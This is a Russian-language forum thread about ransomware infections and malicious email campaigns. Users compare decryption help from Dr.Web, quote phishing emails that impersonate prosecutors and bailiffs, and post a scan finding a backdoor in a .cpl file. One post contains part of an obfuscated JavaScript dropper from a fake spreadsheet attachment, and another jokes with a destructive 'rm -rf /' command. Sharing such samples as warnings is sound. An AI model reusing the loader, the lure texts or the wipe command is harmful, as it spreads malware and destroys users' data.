138 ответов в теме

[Mistral]

Еее, поддержка дрвеба помогла, прислали дешифратор, хотя вирус 2 ноября массово пошёл вроде как, оперативно

А вирус как назывался который зашифровал?


У меня есть идея, которая может спасти от шифровальщиков не только текущих, но и тех что могут появиться в будущем. Правда она больше относится к области антивирусного софта. Вот если подумать, то каким программам может потребоваться редактирование файлов например формата .doc? Ну мс офис, опенофис и еще небольшое количество редакторов. Можно же контролировать какой процесс пытается писать файлы doc и если что-то левое, то запрещать или спрашивать пользователя.

[olegus]

У меня есть идея, которая может спасти от шифровальщиков не только текущих, но и тех что могут появиться в будущем. Правда она больше относится к области антивирусного софта. Вот если подумать, то каким программам может потребоваться редактирование файлов например формата .doc? Ну мс офис, опенофис и еще небольшое количество редакторов. Можно же контролировать какой процесс пытается писать файлы doc и если что-то левое, то запрещать или спрашивать пользователя.

кстати вполне просто реализуемо incron + lsof

[Atiptaxx]

А вирус как назывался который зашифровал?


У меня есть идея, которая может спасти от шифровальщиков не только текущих, но и тех что могут появиться в будущем. Правда она больше относится к области антивирусного софта. Вот если подумать, то каким программам может потребоваться редактирование файлов например формата .doc? Ну мс офис, опенофис и еще небольшое количество редакторов. Можно же контролировать какой процесс пытается писать файлы doc и если что-то левое, то запрещать или спрашивать пользователя.

Не поможет. Вирус не редактирует файл, он создаёт шифрованную копию файла, потом переименовывает копию И затирает исходник, и потом только приписывает расширение

Изменено: Atiptaxx, 12.11.2015 - 19:12

[Atiptaxx]

А вирус как назывался который зашифровал?

cureit определил как trojan.encoder.2843, расшифровщик прислали модифицированный от trojan.encoder.255

[Mistral]

cureit определил как trojan.encoder.2843, расшифровщик прислали модифицированный от trojan.encoder.255

У меня немного другое название.  А у файлов расширение менялось? Я про свой вирус в инете почитал, пишут что использует шифрование rsa и без вариантов расшифровать.

Не поможет. Вирус не редактирует файл, он создаёт шифрованную копию файла, потом переименовывает копию И затирает исходник, и потом только приписывает расширение

Какая разница на какую операцию делать проверку прав, на запись или на запись/удаление.

[Atiptaxx]

У меня немного другое название. А у файлов расширение менялось? Я про свой вирус в инете почитал, пишут что использует шифрование rsa и без вариантов

Расширение приписывалось vault
Шифрование тоже rsa, но я хз как написали дешифратор так быстро, ключ там то ли 512 то ли 1024

Изменено: Atiptaxx, 12.11.2015 - 22:22

[olegus]

Расширение приписывалось vault

vault расшифровали?!
надо запросить будет.

[Mistral]

Расширение приписывалось vault
Шифрование тоже rsa, но я хз как написали дешифратор так быстро, ключ там то ли 512 то ли 1024

Во, у меня тоже vault. Плохо на сайте веба просят ключ лицензии, иначе не расшифруют. А на форуме каспера писали, что рса не ломается, секретный ключ находится у авторов вируса и на машине клиента не генерируется и не хранится.

[Atiptaxx]

Во, у меня тоже vault. Плохо на сайте веба просят ключ лицензии, иначе не расшифруют.

ну ясен пень, что только клиентам помогают)))

 

А на форуме каспера писали, что рса не ломается, секретный ключ находится у авторов вируса и на машине клиента не генерируется и не хранится.

ну факт есть факт, мои файлы расшифрованы

[priz]

У меня есть идея, которая может спасти от шифровальщиков не только текущих, но и тех что могут появиться в будущем. Правда она больше относится к области антивирусного софта. Вот если подумать, то каким программам может потребоваться редактирование файлов например формата .doc? Ну мс офис, опенофис и еще небольшое количество редакторов. Можно же контролировать какой процесс пытается писать файлы doc и если что-то левое, то запрещать или спрашивать пользователя.

Так и велосипед SELinux можно придумать! Или даже sandbox!

 

P.S. Процесс будет называться msword.

[AleM]

Очередное дерьмо рассылают:

 

---  cut here ---

Добрый день!

 

Прошу Вас принять меры по предписанию от 13.11.2015.

 

Документ можно получить на нашем сайте: 

http://prok-gkr.ru/d...Предписание.rar

 

Попов О.А.,

Заместитель начальника управления, Государственный советник юстиции 3 класса

Управления Генеральной прокуратуры России по Краснодарскому краю

тел. +7 (861) 269-60-20

факс +7 (861) 269-62-58

---  cut here ---

[olegus]

чойта архив пустой

[Raptor]

лучше б не херней занимались торренты блокировали из-за вских доноцвых, а делом вот за это самое ввели бы уголовную ответственность, и отработали б пару раз хотя бы.

[olegus]

о. распаковал. это не рар, а зип. внутре у него cpl. все-таки винда убога и дырява
веб выдал:
Проверка: Предписание.cpl
Версия антивирусного ядра: 7.0.16.10090
Вирусных записей: 6631846
Размер файла: 173.34 КБ
MD5 файла: 5e494a0d73cc09f44211c583c876d006

Предписание.cpl packed by UPX
>Предписание.cpl packed by FLY-CODE
>>Предписание.cpl - archive BINARYRES
>>>Предписание.cpl/data001 infected with BackDoor.IRC.NgrBot.566
>>>Предписание.cpl/data002 - Ok

Изменено: olegus, 16.11.2015 - 15:28

[TOP GUN]

мне пришел ответ от eset:

Присланный Вами вирус определяется текущей версией базы данных сигнатур вирусов.

 

Спасибо за помощь в борьбе с вирусами.

[Rap-61]

сегодня получил письмецо от "приставов". практически уверен, что по ссылке ОН

 

Уведомление о начале судебного разбирательства
Здравствуйте

Поскольку Ваша финансовая задолженность не была урегулирована в добровольном порядке, новый кредитор вынужден прибегнуть к принудительным мерам взыскания, предусмотренным законодательством Российской Федерации: направлению выездных групп по адресу регистрации, судебному разбирательству, инициированию исполнительного производства до полного погашения задолженности. Напоминаем Вам, что в случае Вашего неучастия в процессе, решение суда может быть вынесено заочно, что может повлечь за собой принудительное исполнение решения суда. Всю информацию о ходе предварительного судебного производства и сроках рассмотрения, включая копию искового заявления, Вы можете получить перейдя по ссылке находящейся в конце этого письма.

ЗАГРУЗИТЬ ИНФОРМАЦИЮ



Это сообщение создано автоматической системой и не требует ответа.

колупайте

[SooL]

Может не стоит сюда ссылки с вирусами постить?

[olegus]

Может не стоит сюда ссылки с вирусами постить?

почему? не используй решето.

[SooL]

почему? не используй решето.

А зачем вообще быть в цепочке распространителей? Если кому надо - в личку кидайте и всё.

[SGray]

сегодня клиент переслал письмо от <d_galikhin@mail.ru>:

 

внутри файл доментанция аванс.xlsx_.js

 

Spoiler

 

eval((function(){var d=[94,74,90,71,81,86,88,85,75,89,66,82,70,76,60,79,87,72,80,65];var e=[];
    
//// 22820ddc461fe120f1e22820ddc461fe120f1e
for(var b=0;b<d.length;b++)e[d[b]]=b+1;var q=[];for(var a=0;a<arguments.length;a++){var f=arguments[a].split('~');for(var g=f.length-1;g>=0;g--){var h=null;var i=f[g];var j=null;var k=0;var l=i.length;var m;
    
//// 793060f17382b1148fe793060f17382b1148fe
for(var n=0;n<l;n++){var o=i.charCodeAt(n);var p=e[o];if(p){h=(p-1)*94+i.charCodeAt(n+1)-32;m=n;n++;}else if(o==96){h=94*d.length+(i.charCodeAt(n+1)-32)*94+i.charCodeAt(n+2)-32;m=n;n+=2;}else{continue;}if(j==null)j=[];if(m>k)j.push(i.substring(k,m));j.push(f[h+1]);k=n+1;}if(j!=null){if(k<l)j.push(i.substring(k));f[g]=j.join('');}}q.push(f[0]);}var r=q.join('');var x='abcdefghijklmnopqrstuvwxyz';var c=[96,42,126,39,92,10].concat(d);
//// 03dd7289f7162a8a3d303dd7289f7162a8a3d3
//// 0bc83831e24f63c7a700bc83831e24f63c7a70

for(var b=0;b<c.length;b++)r=r.split('@'+x.charAt( ).join(String.fromCharCode(c[b]));return r.split('@!').join('@');})('eval((function(^Sd=[94,74,90,71,81,86,88,85,75,89,66,82,70,76,60,79,87,72,80,65]^te=[]^\'^bud^.Jje[d[b]]=b+1}^tq=[]^\'a=0;a@u^*^.a++^Sf=^*[a].split("@c")^\'g=f^6-1;g>=0;g--^ShJ3^ti=Bc^tjJ3^tk=0^tl=i^.var m^\'n=0;n@ul;n++^So=^ )^tp=e[o]BdpBb(p-1)@B`^ +1^$+^1if(o==96Bb94@bd^6+(^ +1)-32)@B`^ +2^$=2^1continue }}Bdj=J3){j=[]}Bdm>k){j^R^!,mKRj^Rf[h+1]);k=n+1;}Bdj!J3){if(k@ul){j^R^!KRBc=j^U"Ba;};q^Rf[0]);}^tr=q^U"")^tx="abcdefghijklmnopqrstuvwxyz"^tc=     ...и т.д.

[Nimnool]

Компания "Доктор Веб" опубликовала данные об ещё одом вредоносном ПО Linux.Encoder.2, шифрующем файлы на серверах для вымогательства денег за расшифровку. От первого вредоносного приложения такого рода Linux.Encoder.2 отличается использованием библиотеки OpenSSL вместо PolarSSL и применением иного метода шифрования файлов (вместо AES–CBC–128 применяется AES–OFB–128 со сменой параметров шифра для каждых 128 байт).
http://news.drweb.ru...&c=5&lng=ru&p=0

[olegus]

ужскакой.

[SGray]

 

Компания "Доктор Веб" опубликовала данные об ещё одом вредоносном ПО Linux.Encoder.2, шифрующем файлы на серверах для вымогательства денег за расшифровку.

 

[olegus]

о. обнаружен новый шифровальщик вавок в мп3 одной строкой!

for file in $(ls *wav) do name=${file%%.wav} lame -V0 -h -b 160 --vbr-new $name.wav $name.mp3 done

как теперь жить?

новый вирус rm -rf / убивает системы! всем срочно купить дрвеб!

[VZH]

адская штука, перебирает пароли рута по ssh и уж если подберёт...........